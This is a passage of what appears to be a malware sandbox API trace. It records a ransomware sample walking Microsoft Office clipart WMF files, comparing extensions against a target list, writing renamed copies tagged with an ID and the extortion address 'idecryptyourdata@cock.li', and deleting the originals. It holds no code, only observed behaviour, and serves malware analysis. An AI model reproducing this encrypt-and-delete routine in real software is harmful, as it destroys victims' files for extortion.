(lpString=".bz2") returned 4 [0198.347] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.347] lstrlenW (lpString=".7z") returned 3 [0198.347] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186360.WMF") returned 68 [0198.347] lstrlenW (lpString=".dbf") returned 4 [0198.347] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186360.WMF") returned 68 [0198.347] lstrlenW (lpString=".1cd") returned 4 [0198.347] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186360.WMF") returned 68 [0198.347] lstrlenW (lpString=".jpg") returned 4 [0198.347] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.348] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.348] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.348] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186362.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186362.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0198.348] GetLastError () returned 0x0 [0198.348] ReadFile (in: hFile=0x390, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x44fe, lpOverlapped=0x0) returned 1 [0198.674] WriteFile (in: hFile=0x334, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x4500, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x4500, lpOverlapped=0x0) returned 1 [0198.675] ReadFile (in: hFile=0x390, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.675] WriteFile (in: hFile=0x334, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.676] SetEndOfFile (hFile=0x334) returned 1 [0198.676] CloseHandle (hObject=0x334) returned 1 [0198.676] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.676] SetEndOfFile (hFile=0x390) returned 1 [0198.677] CloseHandle (hObject=0x390) returned 1 [0198.677] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186362.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.840] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186362.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186362.wmf")) returned 1 [0198.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186362.WMF") returned 68 [0198.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186362.WMF") returned 68 [0198.840] lstrlenW (lpString=".doc") returned 4 [0198.841] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.841] lstrlenW (lpString=".docx") returned 5 [0198.841] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0198.841] lstrlenW (lpString=".pdf") returned 4 [0198.841] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.841] lstrlenW (lpString=".xls") returned 4 [0198.841] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.841] lstrlenW (lpString=".xlsx") returned 5 [0198.841] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0198.841] lstrlenW (lpString=".ppt") returned 4 [0198.841] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.841] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186362.WMF") returned 68 [0198.841] lstrlenW (lpString=".zip") returned 4 [0198.841] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.841] lstrlenW (lpString=".rar") returned 4 [0198.841] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.841] lstrlenW (lpString=".bz2") returned 4 [0198.841] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.841] lstrlenW (lpString=".7z") returned 3 [0198.841] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.841] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186362.WMF") returned 68 [0198.841] lstrlenW (lpString=".dbf") returned 4 [0198.841] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.841] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186362.WMF") returned 68 [0198.841] lstrlenW (lpString=".1cd") returned 4 [0198.841] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.841] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186362.WMF") returned 68 [0198.841] lstrlenW (lpString=".jpg") returned 4 [0198.841] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.842] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.842] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.842] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188513.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188513.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0198.843] GetLastError () returned 0x0 [0198.843] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x3004, lpOverlapped=0x0) returned 1 [0198.844] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x3010, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x3010, lpOverlapped=0x0) returned 1 [0198.846] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.846] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.846] SetEndOfFile (hFile=0x390) returned 1 [0198.846] CloseHandle (hObject=0x390) returned 1 [0198.846] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.846] SetEndOfFile (hFile=0x378) returned 1 [0198.852] CloseHandle (hObject=0x378) returned 1 [0198.852] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188513.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.853] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188513.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188513.wmf")) returned 1 [0198.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188513.WMF") returned 68 [0198.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188513.WMF") returned 68 [0198.853] lstrlenW (lpString=".doc") returned 4 [0198.853] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.853] lstrlenW (lpString=".docx") returned 5 [0198.853] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0198.854] lstrlenW (lpString=".pdf") returned 4 [0198.854] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.854] lstrlenW (lpString=".xls") returned 4 [0198.854] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.854] lstrlenW (lpString=".xlsx") returned 5 [0198.854] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0198.854] lstrlenW (lpString=".ppt") returned 4 [0198.854] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188513.WMF") returned 68 [0198.854] lstrlenW (lpString=".zip") returned 4 [0198.854] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.854] lstrlenW (lpString=".rar") returned 4 [0198.854] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.854] lstrlenW (lpString=".bz2") returned 4 [0198.854] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.854] lstrlenW (lpString=".7z") returned 3 [0198.854] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188513.WMF") returned 68 [0198.854] lstrlenW (lpString=".dbf") returned 4 [0198.854] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188513.WMF") returned 68 [0198.854] lstrlenW (lpString=".1cd") returned 4 [0198.854] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188513.WMF") returned 68 [0198.854] lstrlenW (lpString=".jpg") returned 4 [0198.854] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.855] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.855] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.855] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188519.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188519.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0198.863] GetLastError () returned 0x0 [0198.863] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x16c0, lpOverlapped=0x0) returned 1 [0198.877] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x16d0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x16d0, lpOverlapped=0x0) returned 1 [0198.878] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.878] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.878] SetEndOfFile (hFile=0x390) returned 1 [0198.878] CloseHandle (hObject=0x390) returned 1 [0198.878] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.878] SetEndOfFile (hFile=0x378) returned 1 [0198.879] CloseHandle (hObject=0x378) returned 1 [0198.879] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188519.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.880] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188519.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188519.wmf")) returned 1 [0198.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188519.WMF") returned 68 [0198.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188519.WMF") returned 68 [0198.881] lstrlenW (lpString=".doc") returned 4 [0198.881] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.881] lstrlenW (lpString=".docx") returned 5 [0198.881] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0198.881] lstrlenW (lpString=".pdf") returned 4 [0198.881] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.881] lstrlenW (lpString=".xls") returned 4 [0198.881] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.881] lstrlenW (lpString=".xlsx") returned 5 [0198.881] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0198.881] lstrlenW (lpString=".ppt") returned 4 [0198.881] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188519.WMF") returned 68 [0198.881] lstrlenW (lpString=".zip") returned 4 [0198.881] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.881] lstrlenW (lpString=".rar") returned 4 [0198.881] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.881] lstrlenW (lpString=".bz2") returned 4 [0198.881] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.881] lstrlenW (lpString=".7z") returned 3 [0198.881] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188519.WMF") returned 68 [0198.881] lstrlenW (lpString=".dbf") returned 4 [0198.881] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188519.WMF") returned 68 [0198.881] lstrlenW (lpString=".1cd") returned 4 [0198.881] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188519.WMF") returned 68 [0198.881] lstrlenW (lpString=".jpg") returned 4 [0198.881] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.882] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.882] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188587.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188587.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0198.883] GetLastError () returned 0x0 [0198.883] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x3b5c, lpOverlapped=0x0) returned 1 [0198.885] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x3b60, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x3b60, lpOverlapped=0x0) returned 1 [0198.886] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.886] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.886] SetEndOfFile (hFile=0x390) returned 1 [0198.886] CloseHandle (hObject=0x390) returned 1 [0198.886] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.886] SetEndOfFile (hFile=0x378) returned 1 [0198.887] CloseHandle (hObject=0x378) returned 1 [0198.887] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188587.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.888] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188587.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188587.wmf")) returned 1 [0198.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188587.WMF") returned 68 [0198.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188587.WMF") returned 68 [0198.888] lstrlenW (lpString=".doc") returned 4 [0198.888] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.889] lstrlenW (lpString=".docx") returned 5 [0198.889] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0198.889] lstrlenW (lpString=".pdf") returned 4 [0198.889] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.889] lstrlenW (lpString=".xls") returned 4 [0198.889] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.889] lstrlenW (lpString=".xlsx") returned 5 [0198.889] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0198.889] lstrlenW (lpString=".ppt") returned 4 [0198.889] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188587.WMF") returned 68 [0198.889] lstrlenW (lpString=".zip") returned 4 [0198.889] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.889] lstrlenW (lpString=".rar") returned 4 [0198.889] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.889] lstrlenW (lpString=".bz2") returned 4 [0198.889] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.889] lstrlenW (lpString=".7z") returned 3 [0198.889] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188587.WMF") returned 68 [0198.889] lstrlenW (lpString=".dbf") returned 4 [0198.889] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188587.WMF") returned 68 [0198.889] lstrlenW (lpString=".1cd") returned 4 [0198.889] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188587.WMF") returned 68 [0198.889] lstrlenW (lpString=".jpg") returned 4 [0198.889] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.890] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.890] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.890] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188667.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188667.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0198.891] GetLastError () returned 0x0 [0198.891] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x3e9e, lpOverlapped=0x0) returned 1 [0198.893] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x3ea0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x3ea0, lpOverlapped=0x0) returned 1 [0198.894] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.894] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.894] SetEndOfFile (hFile=0x390) returned 1 [0198.894] CloseHandle (hObject=0x390) returned 1 [0198.894] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.894] SetEndOfFile (hFile=0x378) returned 1 [0198.895] CloseHandle (hObject=0x378) returned 1 [0198.896] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188667.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.896] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188667.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188667.wmf")) returned 1 [0198.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188667.WMF") returned 68 [0198.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188667.WMF") returned 68 [0198.897] lstrlenW (lpString=".doc") returned 4 [0198.897] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.897] lstrlenW (lpString=".docx") returned 5 [0198.897] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0198.897] lstrlenW (lpString=".pdf") returned 4 [0198.897] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.897] lstrlenW (lpString=".xls") returned 4 [0198.897] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.897] lstrlenW (lpString=".xlsx") returned 5 [0198.897] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0198.897] lstrlenW (lpString=".ppt") returned 4 [0198.897] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188667.WMF") returned 68 [0198.897] lstrlenW (lpString=".zip") returned 4 [0198.897] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.897] lstrlenW (lpString=".rar") returned 4 [0198.897] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.897] lstrlenW (lpString=".bz2") returned 4 [0198.897] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.897] lstrlenW (lpString=".7z") returned 3 [0198.897] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188667.WMF") returned 68 [0198.897] lstrlenW (lpString=".dbf") returned 4 [0198.897] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188667.WMF") returned 68 [0198.897] lstrlenW (lpString=".1cd") returned 4 [0198.897] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188667.WMF") returned 68 [0198.897] lstrlenW (lpString=".jpg") returned 4 [0198.897] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.898] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.898] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.898] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188669.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188669.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0198.899] GetLastError () returned 0x0 [0198.899] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x73a2, lpOverlapped=0x0) returned 1 [0198.958] 